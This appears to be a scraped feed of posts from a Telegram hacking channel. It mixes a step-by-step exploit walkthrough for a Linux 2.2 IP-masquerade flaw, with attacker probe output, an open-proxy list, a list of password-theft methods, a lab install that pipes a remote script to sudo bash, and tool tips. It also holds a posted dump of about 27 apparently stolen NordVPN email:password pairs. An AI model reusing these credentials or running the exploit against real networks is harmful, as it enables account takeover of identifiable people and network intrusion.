UNDERCODE COMMUNITY
2.69K subscribers
1.23K photos
31 videos
2.65K files
80.3K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Security kernel IP camouflage has security holes :
t.me/UndercodeTesting


1) There are serious security vulnerabilities in the IP camouflage implementation of Linux system 2.2.x kernel. There is a lack of serious inspection of the connection in the relevant core code. The attacker can rewrite the UDP disguise entry in the core so that the attacker's UDP packet can be routed into the internal machine.

2) When an internal IP wants to access the DNS server of the external network, when the sent UDP packet passes through the IP masquerading gateway, the kernel will add an entry to record the connection. For example, a UDP packet connected from port 1035 of internal host A to port 53 of external host C. The kernel replaces the source address of this packet with the IP of the disguised gateway (B). Port, the default is from 61000 port to 65096 port, so in theory, the core can handle 4096 TCP / UDP camouflage connections at the same time.

>Host A: 1035-> GW B: 63767-> Host C: 53
πŸ¦‘ HOW IT WORKS ?

When an external network sends a UDP packet to a disguised gateway, Linux IP disguise only decides whether this UDP packet should be forwarded to the internal network based on the target port. If the target port has a corresponding entry in the established camouflage connection table, it will update the source ip and source port in this packet to the remote host ip and port of the corresponding entry. As long as the attacker judges the port of the masquerading gateway, he may use his own IP and port to rewrite the masquerading connection table. The port range used by the masquerade gateway to serve the masquerade connection is usually from 61000 to 65096, so it is easy for external attackers to determine which ports have been used to establish the connection. An attacker can send UDP detection packets to these ports disguised as a gateway, and then check the IP ID of the port's ICMP response packet. Each host sends a packet, the IP ID in its TCP / IP stack will increase by one. Therefore, the ICMP response sent to the port used for IP masquerading will have the IP ID of the internal host.
πŸ¦‘EXPLOITING .. This ID will usually be much different from the current IP ID of the gateway host, usually above 1000. The following example shows the process of exploiting weaknesses:

Host A is an internal host (192.168.1.100)

Host B is a disguised gateway (192.168.1.1 / 10.0.0.1)

Host C is an external DNS server (10.0.0.25).

Host X is an external attacker's IP (10.10.187.13)

. Before the detection, execute the command on the masquerade gateway: ipchains -L -M -n to display the current masquerade connection table Situation:

> UDP 03: 39.21 192.168.1.100 10.0.0.25 1035 (63767)-> 53

is currently a connection sent from port 1035 of 192.168.1.100 to port 53 of 10.0.0.25, the masquerading port is 63767

[from the attacker ’s The result of tcpdump on the machine]

(To make it easier to see the problem, here we set the source port of all detection packets to 12345)

[Our detection will start from port 61000, we have omitted some of the previous results]

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63762 unreachable [tos 0xd8] (ttl 245, id 13135)

10.10.187.13.12345> 10.0.0.1.63763: udp 0 (DF) [tos 0x18] ( ttl 254, id 23069)

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63763 unreachable [tos 0xd8] (ttl 245, id 13136)

10.10.187.13.12345> 10.0.0.1.63764: udp 0 (DF ) [tos 0x18] (ttl 254, id 23070)

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63764 unreachable [tos 0xd8] (ttl 245, id 13137)

10.10.187.13.12345> 10.0.0.1.63765: udp 0 (DF) [tos 0x18] ( ttl 254, id 23071)

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63765 unreachable [tos 0xd8] (ttl 245, id 13138)

10.10.187.13.12345> 10.0.0.1.63766: udp 0 (DF ) [tos 0x18] (ttl 254, id 23074)

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63766 unreachable [tos 0xd8] (ttl 245, id 13139)

10.10.187.13.12345> 10.0.0.1. 63 767: 0 UDP (the DF) [TOS 0x18] (TTL 254, ID 23083)

10.0.0.1> 10.10.187.13: ICMP: 10.0.0.1 unreachable The UDP Port 63767 [TOS 0xD8] (TTL 244, ID 17205)
πŸ¦‘ The ID of the above package is 17205, and the difference between it and 13139 has exceeded 4000, which means that we have found a pretended connection. !!!

10.10.187.13.12345> 10.0.0.1.63768: udp 0 (DF) [tos 0x18] (ttl 254, id 23084)

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63768 unreachable [tos 0xd8] (ttl 245, id 13140)

10.10.187.13.12345> 10.0.0.1.63769: udp 0 (DF) [tos 0x18] (ttl 254, id 23088)

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63769 unreachable [tos 0xd8] (ttl 245, id 13141)

10.10.187.13.12345> 10.0.0.1.63770: udp 0 (DF) [tos 0x18] (ttl 254, id 23090)

10.0.0.1> 10.10.187.13 : icmp: 10.0.0.1 udp port 63770 unreachable [tos 0xd8] (ttl 245, id

13142 ) 10.10.187.13.12345> 10.0.0.1.63771: udp 0 (DF) [tos 0x18] (ttl 254, id 23091)

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63771 unreachable [tos 0xd8] (ttl 245, id 13143)

10.10.187.13.12345> 10.0.0.1.63771: udp 0 (DF) [tos 0x18] ( ttl 254, id 23092)

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63772 unreachable [tos 0xd8] (ttl 245, id 13144)

[our detected end of port 65096, we have omitted some results]

now Let's check the situation of the masquerading connection table of the masquerading gateway:

ipchains -L -M -n

> UDP 04: 35.12 192.168.1.100 10.10.187.13 1035 (63767)-> 12345

You can see that the remote host has been replaced by an attack The ip of the attacker is 10.10.187.13, and the target port is also replaced by the source port used for attacker detection: 12345.

Now the attacker can send UDP data from the source port 12345 to port 1035 of the internal host.



-------------------------------------------------- ------------------------------

πŸ¦‘Suggestion:

For the problem of accessing external DNS, a possible solution is to set it on the disguised gateway A cached domain name server, and then prohibit the disguise of UDP packets.

written by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘FRESH ELITE PROXIES

187.65.203.245 80 1 hour ago
5854 ms 6% (74) br Brazil - Sao Jose Elite -
212.57.22.178 8080 1 hour ago
2440 ms 64% (60) tr Turkey Elite -
210.56.245.77 8080 1 hour ago
4203 ms 3% (76) au Australia Elite -
36.91.28.210 8080 1 hour ago
4595 ms 8% (68) id Indonesia Elite -
163.53.209.7 6666 1 hour ago
3799 ms 6% (53) in India - Modasa Elite -
95.38.14.3 8080 1 hour ago
3777 ms 21% (68) ir Iran Elite -
178.128.159.243 5836 1 hour ago
1466 ms 6% (68) gr Greece Elite -
163.204.241.112 9999 1 hour ago
2250 ms 2% (66) cn China Elite -
122.226.57.70 8888 1 hour ago
1019 ms 31% (59) cn China Elite -
95.216.203.174 3128 1 hour ago
531 ms 100% (8) ua Ukraine Elite -
85.10.219.98 1080 1 hour ago
4152 ms 45% (49) de Germany Elite -
77.94.144.164 3128 1 hour ago
3730 ms 10% (73) si Slovenia - Ljubljana Elite -
88.99.10.254 1080 1 hour ago
3187 ms 58% (57) de Germany Elite -
85.10.219.100 1080 1 hour ago
4056 ms 34% (57) de Germany Elite -
3.249.104.236 3128 1 hour ago
3634 ms 25% (58) ie Ireland - Dublin Elite -
82.119.170.106 8080 1 hour ago
556 ms 86% (56) de Germany - Berlin Elite -
64.225.112.121 8080 1 hour ago
2791 ms 29% (66) us United States - New York Elite -
5.59.145.129 8080 1 hour ago
4027 ms 10% (66) ru Russia - Novocherkassk Elite -
200.108.183.2 8080 1 hour ago
2548 ms 19% (70) uy Uruguay Elite -
151.233.202.31 8080 1 hour ago
2525 ms 7% (81) ir Iran Elite -
34.83.68.150 8080 1 hour ago
186 ms 6% (68) us United States Elite -
113.254.182.241 80 1 hour ago
822 ms 30% (55) hk Hong Kong - Central Elite -
103.209.64.19 6666 1 hour ago
3936 ms 10% (70) in India - Valsad Elite -
159.8.114.37 25 1 hour ago
411 ms 96% (47) fr France - Clichy Elite -
159.8.114.37 80 1 hour ago
847 ms 98% (38) fr France - Clichy Elite -
159.8.114.37 8123 1 hour ago
948 ms 91% (42) fr France - Clichy Elite -
34.87.96.183 8118 1 hour ago
2333 ms 10% (54) us United States Elite -
47.52.231.140 8080 1 hour ago
1663 ms 26% (51) hk Hong Kong Elite -
210.140.219.111 8080 1 hour ago
4336 ms 15% (63) jp Japan Elite -
46.235.53.26 3128 1 hour ago
1782 ms 36% (56) ru Russia - Moscow Elite -
195.170.15.66 8080 1 hour ago
4067 ms 14% (66) gr Greece Elite -
175.100.30.156 25 1 hour ago
4405 ms 14% (66) kh Cambodia Elite -
188.165.16.230 3129 1 hour ago
2565 ms 66% (43) pl Poland Elite -
102.67.19.132 8080 1 hour ago
4380 ms 10% (61) ng Nigeria - Lagos Elite -
103.240.161.109 6666 1 hour ago
4480 ms 8% (64) in India - Patan Elite -

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘LINUX SECURITY

> Here is a brief introduction to several tools to enhance Linux network security.

1) Sudo
γ€€γ€€ sudo is a program used by system administrators to allow certain users to run some / all system commands as root. An obvious purpose is to enhance the security of the site. If you need to do some daily work as root every day, often execute some fixed commands that can only be executed as root, then sudo is very suitable for you.
The homepage of sudo

> Taking Redhat as an example, the following describes the installation and setup process:
γ€€
γ€€
> First, you can download the rpm package for Redhat Linux from the sudo homepage.
It is currently available at ftp://ftp.freshmeat.net/pub/rpms/sudo/ the latest stable
γ€€γ€€
>Execute #rpm -ivh sudo * to install, then edit / etc / sudoers file with / usr / sbin / visudo.
If you are prompted that you cannot find / usr / bin / vi but you actually have the vi program in the directory / bin, you need
ln -sf / bin / vi / usr / bin / vi creates a symbolic link under / usr / bin for vi. (Note: I met on Redhat 6.1, there is no problem on Redhat 5.x)
γ€€γ€€
> Also, if some other error occurs, you may also need #chmod 700 / var / run / sudo

2) Here is my / etc / sudoers File example:
[root @ sh-proxy / etc] # more sudoers
Host_Alias ​​SERVER = sh-proxy

# User alias specification

User_Alias ​​ADMIN = jephe, tome

# Cmnd alias specification

Cmnd_Alias ​​SHUTDOWN = / etc / halt, / etc / shutdown, / etc / reboot

ADMIN SERVER = SHUTDOWN
jephe SERVER = / usr / bin / tail -f / var / log / maillog
jephe SERVER = / usr / bin / tail -f / var / log / messages

# User privilege specification
root ALL = (ALL) ALL

3) observe the changes in the email log file / var / log / maillog, so I added this line to / etc / sudoers

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘POPULAR WAYS TO GET PASSWORDS AND ACCOUNTS :
t.me/UndercodeTesting

1 )Credential Stuffing

Credential stuffing, also known as list cleaning and breach replay, is a means of testing databases or lists of stolen credentials – i.e., passwords and user names – against multiple accounts to see if there’s a match

2) Phishing

Phishing is a social engineering trick which attempts to trick users into supplying their credentials to what they believe is a genuine request from a legitimate site or vendor.

3) Password Spraying

Password spraying is a technique that attempts to use a list of commonly used passwords against a user account name, such as 123456, password123, 1qaz2wsx, letmein, batman and others.

4) Keylogging

Keyloggers record the strokes you type on the keyboard and can be a particularly effective means of obtaining credentials for things like online bank accounts, crypto wallets and other logins with secure forms.

5) Brute Force

It’s the kind of thing that security researchers like to write about, or which you might see in TV shows: a hacker runs an algorithm against an encrypted password and in 3…2…1… the algorithm cracks the password and reveals it in plain text.

6) Local Discovery

Local discovery occurs when you write down or use your password somewhere where it can be seen in plain text. The attacker finds the password and uses it, often without your knowledge that the password has been leaked.

7) Extortion

Straightforward blackmail technique that depends on the nature of the relationship between the attacker and the target. Someone may demand your password if they have the means to harm or embarrass you if you don’t comply, such as revealing sensitive information, images or videos about you, or threatening the physical safety of yourself or your loved ones. RAT malware that lets hackers spy on you through a web or video cam can expose you to this kind of extortion.

@undercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ ALL Ghost command line parameter list
instagram.com/UndercodeTesting


πŸ¦‘π•ƒπ”Όπ•‹'π•Š π•Šπ•‹π”Έβ„π•‹ :


Many people have heard or used Norton Ghost software, but because its interface is all in English, many domestic netizens have a headache for this. Taking its version 7.0 as an example, the hacker team provided Ghost's command line parameters.



/? Or / H: View help.
-CLONE: clone.
-IA: Map the sectors in all partitions.
-ID: copy the entire disk (including unpartitioned space).
-IR: Same as ID, but does not adjust the partition to sector boundaries.
-IB: Only copy the boot sector of the disk.
-IAL: Copy the entire LINUX partition, use the normal method for other partitions.
-OR: Cover the space and conduct an integrity check.
-NOLILO: Don't try to modify the LILO boot loader after copying.
-BOOTCD: When using -SURE to directly create a CD-R image, expect to find a bootable floppy disk.
-FDSZ: Clear the iconic bytes on the target disk.
-FDSP: reserve the iconic bytes on the target disk. (Priority is higher than -FSSZ)
-LPM: LPT main parallel connection mode.
-LPS: LPT slave parallel connection mode.
-TCPM: TCP / IP main connection mode.
-TCPS: TCP / IP slave connection mode.
-USBM: automatically enter USB main mode.
-USBS: automatically enter USB slave mode.
-JL: record the diagnostic messages of the multicast session to a file.
-JS: Set the maximum multicast value.
-JA: Set the name of the multicast session.
-AUTO: Do not prompt for the file name, use the default value.
-CHKIMG: Check the integrity of the image file.
-PWD: Specify the password.
-SKIP: Specify the file or directory in the FAT file system to be skipped.
-PMBR: When performing any disk copy operation, keep the master boot record in the target disk.
-SPAN: Allow access to multiple volumes.
-SPLIT: When creating an image, divide the image into blocks.
-Z: Compress the image file.
-F64: Allow 64K cluster size when loading old image files.
-FATLIMIT: Prevent the FAT partition size from exceeding 2 trillion.
-F32: Convert FAT16 to FAT32.
-NTD: Allow NTFS internal diagnostic check.
-NTC-: Disable NTFS continuous cluster allocation.
-NTCHKDSK: Force CHKDSK to start on the next NTFS volume.
-NTIC: Ignore the CHKDSK bit on the NTFS volume.
-NTIL: Ignore the non-empty NTFS log file check bit.
-NTIID: Ignore the copy of the partition system identifier.
-TAPEBUFFERED: The default tape mode.
-TAPESAFE: Useful when using old or unreliable tapes.
-TAPESPEED: allows control of tape speed.
-TAPEUNBUFFERED: Force unbuffered tape input and output.
-TAPEEJECT: Forces the tape to be ejected after operation.
-TAPEBSIZE: tape block size.
-RB: Restart automatically after the forced copy is completed.
-FX: Exit the program when copying is completed.
-QUIET: Quiet mode.
-SURE: Use with the -CLONE option to avoid questions.
-BATCH: Batch mode, all operations are automatically completed by the program.
-NOFILE: prohibit file query.
-SCRIPT: automatically run the program according to the commands in the script file.
-DL: Specify the existing hard drive number.
-FIS: Use the maximum detected hard disk.
-FNX: Prohibit the extension of No. 13 interrupt support.
-FFX: Use extended No. 13 interrupt.
-FNI: Prohibit direct IDE hard disk access support.
-FFI: Use direct IDE hard disk access.
-FNS: Disable direct ASPI / SCSI hard disk access support.
-FFS: Use direct ASPI / SCSI hard disk access.
-NOSCSI: It is forbidden to use ASPI to access SCSI devices.
-BFC: handle bad FAT clusters.
-VDM: Use the disk check command to check each sector on the disk before writing.
-FRO: Force to continue copying even if there are bad clusters.
-CRC32: Use CRC32 check.
-CRCIGNORE: Try to ignore errors in the image file.
-FCR: Create a verification file when creating the file.
-AFILE: Use the specified abort log file.
-DI: Display diagnosis.
-MEMCHECK: diagnose memory. 7K Security Technology Network (7k7k5.com)
-DD: Record disk information to GHSTSTAT.TXT.
-DFILE: Use the specified information log file.
-FINGER: Display detailed fingerprint information.

@undercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ iο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘github topic :
A typeface designed for source code
t.me/UndercodeTesting

πŸ¦‘FEATURES :

1) Typeface Name: Hack

2) Category: Monospaced

3) Character set support: ASCII, Latin-1, Latin Extended A, Greek, Cyrillic

4) Powerline Support: Yes, included by default

5) Included Styles: Regular, Bold, Italic, Bold Italic

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

1) Download the latest version of CLICK HERE

2) Extract the files from the archive (.zip).

3) Copy the font files to either your system font folder (often /usr/share/fonts/) or user font folder (often ~/.local/share/fonts/ or /usr/local/share/fonts).

4) Copy the font configuration file in config/fontconfig/ to either the system font configuration folder (often /etc/fonts/conf.d/) or the font user folder (often ~/.config/fontconfig/conf.d)

5) Clear and regenerate your font cache and indexes with the following command:
$ fc-cache -f -v

6) You can confirm that the fonts are installed with the following command:

$ fc-list | grep "Hack"

@UNDERCODETESTING
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘NEW NORDVPN PREM βœ…βœ…

dinwilliam88@hotmail.com:hq27pu2o | @undercodeTesting Expires: 2021-08-26 08:22:49
311stylie@gmail.com:nw020703 | @undercodeTesting Expires: 2020-11-30 01:47:59
arthurzhu96@gmail.com:Palindrome | @undercodeTesting Expires: 2021-12-29 08:08:54
housseau@gmail.com:Mondidi1er | @undercodeTesting Expires: 2022-03-15 19:30:17
jlgardeta@gmail.com:zidane1803 | @undercodeTesting Expires: 2020-05-23 08:43:07
babshaw@yahoo.com:mia4ever | @undercodeTesting Expires: 2022-06-27 05:23:02
jasonmhudson@gmail.com:Rileydog1 | @undercodeTesting Expires: 2021-06-04 02:05:39
samuel.kirner@gmail.com:Har12ry7 | @undercodeTesting Expires: 2020-05-20 00:43:39
ben1b@hotmail.com:Snazbot97 | @undercodeTesting Expires: 2020-06-02 12:19:34
christopherpierce528@gmail.com:Kevin1011 | @undercodeTesting Expires: 2020-05-15 00:00:00
pijones@hotmail.com:slouch27 | @undercodeTesting Expires: 2020-05-20 01:11:28
hilmark05@gmail.com:hk510510 | @undercodeTesting Expires: 2020-11-29 17:32:17
icasaresg@hotmail.com:Mnbvcxz1 | @undercodeTesting Expires: 2021-11-04 17:29:15
episo83@gmail.com:Garcon888 | @undercodeTesting Expires: 2023-05-09 00:08:33
fabienne93@gmail.com:19faby93 | @undercodeTesting Expires: 2021-01-09 10:47:20
chasekennard@yahoo.com:Burton123 | @undercodeTesting Expires: 2020-06-14 21:24:08
mr.tdsmith@gmail.com:ilovebears | @undercodeTesting Expires: 2021-02-22 07:34:24
mrqosmio75@gmail.com:Shanaille01 | @undercodeTesting Expires: 2020-05-23 22:50:28
eckels141@gmail.com:steven421 | @undercodeTesting Expires: 2022-10-02 21:13:40
jlinden@gmail.com:lillian1120 | @undercodeTesting Expires: 2021-05-07 09:55:41
olga.romanova0306@gmail.com:leningrad01 | @undercodeTesting Expires: 2020-08-06 17:53:56
hale73@hotmail.com:halosh05 | @undercodeTesting Expires: 2020-08-05 13:53:41
nixontbr@outlook.com:nixon123 | @undercodeTesting Expires: 2022-05-28 15:54:56
news_best@yahoo.com:navkhor1 | @undercodeTesting Expires: 2020-07-17 19:02:05
benjamin.rubaud@wanadoo.fr:dessin21 | @undercodeTesting Expires: 2022-07-07 20:29:34
isaacmtaylor1997@gmail.com:rooney77 | @undercodeTesting Expires: 2020-05-16 15:01:43
thaneirwin@gmail.com:ph2f13d1 | @undercodeTesting Expires: 2020-05-20 10:26:06

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ practical way you want to use Energized Protection on your devices
t.me/UndercodeTesting

> , if you know what you are doing. But if you are clueless, there are few suggestions.


1) rooted android: Energized Protection Magisk Module makes your experience better on

2) Magisk-ly Rooted Android devices. Grab it from Magisk Manager > Download. If you aren't that familiar with that stuff, then you can use AdAway (Latest) with GIT RAW Sources now.

3) non-rooted android: If you are not using any root solution, then you can use DNS66, BLOKADA, Personal DNS Filter or Nebulo with any of the Energized Source.

4) ios: Use any Adblocking Client app with Energized Protection Source.
windows: On Windows, you can use HostsMan to get the best Windows Hosts Usage Experience. Make sure to disable DNS Client Service.

5) linux: Energized Protection Linux Script is there for you! Check here for more info. Or, simply use hosts!

6) adblockers: Use filter format with uBlock, AdGuard or any other extension, software & app.

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘HACK WEBSITE :
instagram.com/undercodeTesting


1)Download VirtualBox.

2)Download the .ova file from http://websploit.org and import it in VirtualBox. Alternatively,

3)download Kali or Parrot and then run curl -sSL https://websploit.org/install.sh | sudo bash.

4)The following are the vulnerable applications included in WebSploit:

Damn Vulnerable Web Application (DVWA)
Damn Vulnerable Node Application (DVNA)
WebGoat
Hackazon
OWASP Juice Shop
OWASP Mutillidae 2
bWapp2
hackme-rtov

@undercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Cracked Passwords

The following are the cracked passwords of "Exercise 1: Cracking Passwords with John the Ripper" of the Safari Live Training: Ethical Hacking Bootcamp by Omar Santos

1)root@kali:~# john hashes
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"

2)Use the "--format=crypt" option to force loading these as that type instead

3)Using default input encoding: UTF-8

4)Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])

5)Press 'q' or Ctrl-C to abort, almost any other key for status
letmein (batman)
password1 (superman)
password (spiderman)
3g 0:00:00:08 DONE 2/3 (2019-01-12 21:22) 0.3496g/s 1038p/s 1053c/s 1053C/s 123456..green

6)Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~#

@undercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁